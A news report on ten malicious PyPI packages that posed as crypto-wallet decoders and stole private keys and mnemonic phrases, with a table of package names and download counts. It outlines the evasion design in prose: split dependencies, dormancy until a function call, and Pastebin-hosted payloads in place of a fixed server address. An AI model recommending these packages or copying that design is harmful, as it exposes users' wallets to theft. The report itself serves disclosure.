Security researchers have discovered as many as ten malicious packages on the Python Package Index (PyPI) repository. The packages pretended to be legitimate tools for decoding and managing data from multiple popular crypto wallets but were stealing sensitive data from their users. The ten packages have over 3,500 downloads between them.
The attack targeted users of Atomic, Trust Wallet, Metamask, Ronin, TronLink, Exodus, and other popular crypto wallets. The packages promised functionality for crypto users engaged in wallet recovery and management. Still, they would steal sensitive crypto wallet data like private keys and mnemonic phrases behind the scenes, potentially gaining access to the victims’ funds.
The researchers identified that these packages were published on September 22 to the PyPI repository, a popular place for developers to quickly get extensions that enable specific functionality without writing tons of extra code. The packages distributed their source code across dependencies, separating the main package from the more harmful data-stealing components. They would activate only when specific functions were called to evade detection.
The attack chain also differs from the usual modus operandi in such cases. Instead of triggering the malicious packages automatically on installation, the packages only fetch another Python package containing the malicious code. They then lay dormant until a specific function is called, upon which they fetch malicious Python code from a Pastebin link and extract sensitive wallet information to the attacker’s server.
PyPI has taken down the malicious packages, but by then, they had amassed a total of 3,782 downloads. A full list with the number of downloads is as follows.
Package name | Number of downloads |
---|---|
atomicdecoderss | 366 downloads |
trondecoderss | 240 downloads |
phantomdecoderss | 449 downloads |
trustdecoderss | 466 downloads |
exodusdecoderss | 422 downloads |
walletdecoderss | 232 downloads |
ccl-localstoragerss | 335 downloads |
exodushcates | 415 downloads |
cipherbcryptors | 450 downloads |
ccl_leveldbases | (407 downloads) |
To further obfuscate code and hide their identity, the attacker did not hardcode the address of their command and control server in any of the packages, instead using a PasteBin link to deliver the malicious code. This made code analysis difficult and allowed attackers to change or update the malicious code without having to update the malicious repositories themselves.
In the News: Arrested UK national hacked executives’ emails to engage in hack-and-trade